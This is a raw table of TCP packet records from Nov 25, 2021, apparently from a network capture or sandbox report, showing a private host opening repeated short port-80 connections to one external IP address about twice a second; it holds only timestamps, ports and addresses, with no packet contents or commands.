Nov 25, 2021 10:51:46.688458920 CET	50269	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:46.722290039 CET	80	50269	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:47.074388981 CET	50270	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:47.107840061 CET	80	50270	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:47.108092070 CET	50270	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:47.109618902 CET	50270	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:47.143055916 CET	80	50270	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:47.143276930 CET	50270	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:47.176637888 CET	80	50270	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:47.194964886 CET	80	50270	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:47.195014000 CET	80	50270	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:47.195241928 CET	50270	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:47.195291042 CET	50270	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:47.228765965 CET	80	50270	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:47.576030970 CET	50271	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:47.610079050 CET	80	50271	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:47.610336065 CET	50271	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:47.611890078 CET	50271	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:47.645867109 CET	80	50271	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:47.646148920 CET	50271	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:47.680107117 CET	80	50271	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:47.698836088 CET	80	50271	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:47.698913097 CET	80	50271	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:47.699091911 CET	50271	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:47.699150085 CET	50271	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:47.733124971 CET	80	50271	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:48.090917110 CET	50272	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:48.125053883 CET	80	50272	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:48.125241041 CET	50272	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:48.126750946 CET	50272	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:48.161020041 CET	80	50272	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:48.161307096 CET	50272	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:48.195295095 CET	80	50272	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:48.213126898 CET	80	50272	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:48.213181973 CET	80	50272	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:48.213454962 CET	50272	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:48.213536024 CET	50272	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:48.247704029 CET	80	50272	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:48.591181993 CET	50273	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:48.624598026 CET	80	50273	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:48.624867916 CET	50273	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:48.626426935 CET	50273	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:48.659784079 CET	80	50273	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:48.659986019 CET	50273	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:48.693284035 CET	80	50273	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:48.710149050 CET	80	50273	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:48.710197926 CET	80	50273	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:48.710356951 CET	50273	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:48.710407972 CET	50273	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:48.743963957 CET	80	50273	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:49.046938896 CET	50274	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:49.080198050 CET	80	50274	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:49.080436945 CET	50274	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:49.081962109 CET	50274	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:49.115174055 CET	80	50274	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:49.115370035 CET	50274	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:49.148482084 CET	80	50274	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:49.164314032 CET	80	50274	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:49.164334059 CET	80	50274	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:49.164482117 CET	50274	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:49.164526939 CET	50274	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:49.197870970 CET	80	50274	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:49.531498909 CET	50275	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:49.565248966 CET	80	50275	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:49.565586090 CET	50275	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:49.567233086 CET	50275	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:49.601001978 CET	80	50275	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:49.601313114 CET	50275	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:49.635143042 CET	80	50275	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:49.650599003 CET	80	50275	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:49.650648117 CET	80	50275	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:49.650923967 CET	50275	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:49.650984049 CET	50275	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:49.685085058 CET	80	50275	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:50.038224936 CET	50276	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:50.071639061 CET	80	50276	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:50.071842909 CET	50276	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:50.073434114 CET	50276	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:50.106817961 CET	80	50276	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:50.107034922 CET	50276	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:50.140423059 CET	80	50276	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:50.156475067 CET	80	50276	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:50.156533957 CET	80	50276	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:50.156672001 CET	50276	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:50.156740904 CET	50276	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:50.190269947 CET	80	50276	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:50.551779985 CET	50277	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:50.585917950 CET	80	50277	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:50.586128950 CET	50277	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:50.587693930 CET	50277	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:50.621701956 CET	80	50277	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:50.622014046 CET	50277	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:50.656078100 CET	80	50277	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:50.675915956 CET	80	50277	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:50.675972939 CET	80	50277	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:50.676153898 CET	50277	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:50.676232100 CET	50277	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:50.710210085 CET	80	50277	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:51.053916931 CET	50278	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:51.087285042 CET	80	50278	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:51.087507963 CET	50278	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:51.089071035 CET	50278	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:51.122435093 CET	80	50278	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:51.122725010 CET	50278	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:51.156035900 CET	80	50278	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:51.172583103 CET	80	50278	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:51.172648907 CET	80	50278	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:51.173156977 CET	50278	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:51.173219919 CET	50278	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:51.206578016 CET	80	50278	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:51.523200989 CET	50279	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:51.556636095 CET	80	50279	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:51.556858063 CET	50279	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:51.558423042 CET	50279	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:51.591773033 CET	80	50279	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:51.592035055 CET	50279	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:51.625463009 CET	80	50279	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:51.641408920 CET	80	50279	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:51.641468048 CET	80	50279	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:51.641599894 CET	50279	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:51.641660929 CET	50279	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:51.675049067 CET	80	50279	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:52.023313046 CET	50280	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:52.057414055 CET	80	50280	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:52.057622910 CET	50280	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:52.059237957 CET	50280	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:52.093306065 CET	80	50280	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:52.093511105 CET	50280	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:52.127660990 CET	80	50280	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:52.143548965 CET	80	50280	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:52.143613100 CET	80	50280	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:52.143805027 CET	50280	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:52.143899918 CET	50280	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:52.178267956 CET	80	50280	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:52.492172003 CET	50281	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:52.526258945 CET	80	50281	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:52.526575089 CET	50281	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:52.528089046 CET	50281	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:52.562124968 CET	80	50281	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:52.562410116 CET	50281	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:52.596424103 CET	80	50281	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:52.614006042 CET	80	50281	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:52.614056110 CET	80	50281	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:52.614222050 CET	50281	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:52.614280939 CET	50281	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:52.648266077 CET	80	50281	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:52.972038984 CET	50282	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:53.006140947 CET	80	50282	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:53.006491899 CET	50282	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:53.007932901 CET	50282	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:53.041922092 CET	80	50282	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:53.042098999 CET	50282	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:53.076286077 CET	80	50282	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:53.092668056 CET	80	50282	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:53.092732906 CET	80	50282	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:53.093054056 CET	50282	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:53.093151093 CET	50282	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:53.127546072 CET	80	50282	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:53.504605055 CET	50283	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:53.538064003 CET	80	50283	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:53.538288116 CET	50283	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:53.539836884 CET	50283	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:53.573231936 CET	80	50283	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:53.573438883 CET	50283	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:53.606790066 CET	80	50283	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:53.622716904 CET	80	50283	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:53.622766018 CET	80	50283	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:53.622945070 CET	50283	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:53.622993946 CET	50283	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:53.656562090 CET	80	50283	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:54.013423920 CET	50284	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:54.046818972 CET	80	50284	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:54.047262907 CET	50284	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:54.048854113 CET	50284	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:54.082194090 CET	80	50284	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:54.082403898 CET	50284	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:54.115730047 CET	80	50284	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:54.131594896 CET	80	50284	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:54.131649971 CET	80	50284	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:54.131968021 CET	50284	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:54.132051945 CET	50284	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:54.165713072 CET	80	50284	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:54.535517931 CET	50285	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:54.569669008 CET	80	50285	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:54.569973946 CET	50285	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:54.571504116 CET	50285	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:54.605545998 CET	80	50285	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:54.605751038 CET	50285	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:54.639744997 CET	80	50285	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:54.655401945 CET	80	50285	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:54.655450106 CET	80	50285	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:54.655600071 CET	50285	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:54.655647993 CET	50285	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:54.689687014 CET	80	50285	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:55.039478064 CET	50286	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:55.072850943 CET	80	50286	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:55.073071003 CET	50286	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:55.074582100 CET	50286	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:55.107891083 CET	80	50286	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:55.108170986 CET	50286	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:55.141345024 CET	80	50286	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:55.157455921 CET	80	50286	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:55.157556057 CET	80	50286	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:55.157773018 CET	50286	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:55.157821894 CET	50286	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:55.190907001 CET	80	50286	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:55.471494913 CET	50287	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:55.505414009 CET	80	50287	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:55.505726099 CET	50287	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:55.507302046 CET	50287	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:55.541727066 CET	80	50287	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:55.541939974 CET	50287	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:55.575923920 CET	80	50287	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:55.597352982 CET	80	50287	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:55.597400904 CET	80	50287	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:55.597907066 CET	50287	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:55.597955942 CET	50287	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:55.631994009 CET	80	50287	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:56.002799988 CET	50288	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:56.036256075 CET	80	50288	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:56.036484003 CET	50288	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:56.038111925 CET	50288	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:56.071409941 CET	80	50288	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:56.071635962 CET	50288	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:56.105057001 CET	80	50288	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:56.120891094 CET	80	50288	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:56.120944023 CET	80	50288	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:56.121109962 CET	50288	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:56.121160984 CET	50288	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:56.154757977 CET	80	50288	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:56.506324053 CET	50289	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:56.540232897 CET	80	50289	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:56.540443897 CET	50289	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:56.542011976 CET	50289	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:56.575717926 CET	80	50289	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:56.575879097 CET	50289	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:56.609595060 CET	80	50289	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:56.625315905 CET	80	50289	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:56.625324011 CET	80	50289	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:56.625534058 CET	50289	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:56.625544071 CET	50289	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:56.659296036 CET	80	50289	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:57.017134905 CET	50290	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:57.050561905 CET	80	50290	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:57.050868034 CET	50290	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:57.052498102 CET	50290	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:57.085856915 CET	80	50290	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:57.086070061 CET	50290	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:57.119555950 CET	80	50290	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:57.135432959 CET	80	50290	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:57.135495901 CET	80	50290	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:57.135819912 CET	50290	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:57.135917902 CET	50290	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:57.169574976 CET	80	50290	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:57.536479950 CET	50291	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:57.570535898 CET	80	50291	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:57.570785999 CET	50291	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:57.572349072 CET	50291	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:57.606357098 CET	80	50291	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:57.606625080 CET	50291	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:57.640728951 CET	80	50291	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:57.656439066 CET	80	50291	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:57.656502962 CET	80	50291	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:57.656655073 CET	50291	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:57.656719923 CET	50291	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:57.691143990 CET	80	50291	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:58.045869112 CET	50292	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:58.079920053 CET	80	50292	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:58.080185890 CET	50292	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:58.081695080 CET	50292	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:58.115617990 CET	80	50292	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:58.115756035 CET	50292	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:58.150388002 CET	80	50292	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:58.168097019 CET	80	50292	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:58.168170929 CET	80	50292	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:58.168406963 CET	50292	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:58.168467045 CET	50292	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:58.202542067 CET	80	50292	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:58.568407059 CET	50293	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:58.601890087 CET	80	50293	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:58.602199078 CET	50293	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:58.603737116 CET	50293	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:58.637068987 CET	80	50293	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:58.637248039 CET	50293	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:58.670521975 CET	80	50293	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:58.693893909 CET	80	50293	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:58.693938971 CET	80	50293	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:58.694139957 CET	50293	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:58.694180965 CET	50293	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:58.727579117 CET	80	50293	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:59.088414907 CET	50294	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:59.122004032 CET	80	50294	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:59.122239113 CET	50294	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:59.123734951 CET	50294	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:59.157088995 CET	80	50294	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:59.157299995 CET	50294	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:59.190536976 CET	80	50294	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:59.211723089 CET	80	50294	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:59.211733103 CET	80	50294	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:59.212354898 CET	50294	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:59.212364912 CET	50294	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:59.245544910 CET	80	50294	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:59.548108101 CET	50295	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:59.581383944 CET	80	50295	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:59.581617117 CET	50295	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:59.583120108 CET	50295	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:59.616410017 CET	80	50295	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:59.616615057 CET	50295	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:59.649936914 CET	80	50295	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:59.666563988 CET	80	50295	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:59.666589022 CET	80	50295	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:59.666769981 CET	50295	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:59.666793108 CET	50295	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:59.700078964 CET	80	50295	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:00.048988104 CET	50296	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:00.083168983 CET	80	50296	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:00.083420992 CET	50296	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:00.084925890 CET	50296	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:00.118993998 CET	80	50296	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:00.119179964 CET	50296	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:00.153348923 CET	80	50296	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:00.179145098 CET	80	50296	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:00.179217100 CET	80	50296	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:00.179378033 CET	50296	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:00.179445982 CET	50296	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:00.213711977 CET	80	50296	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:00.583683968 CET	50297	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:00.617110968 CET	80	50297	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:00.617405891 CET	50297	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:00.618988991 CET	50297	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:00.652537107 CET	80	50297	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:00.652857065 CET	50297	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:00.686554909 CET	80	50297	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:00.706468105 CET	80	50297	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:00.706536055 CET	80	50297	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:00.706835032 CET	50297	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:00.706942081 CET	50297	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:00.740592957 CET	80	50297	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:01.108460903 CET	50298	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:01.141943932 CET	80	50298	176.223.209.128	192.168.11.20
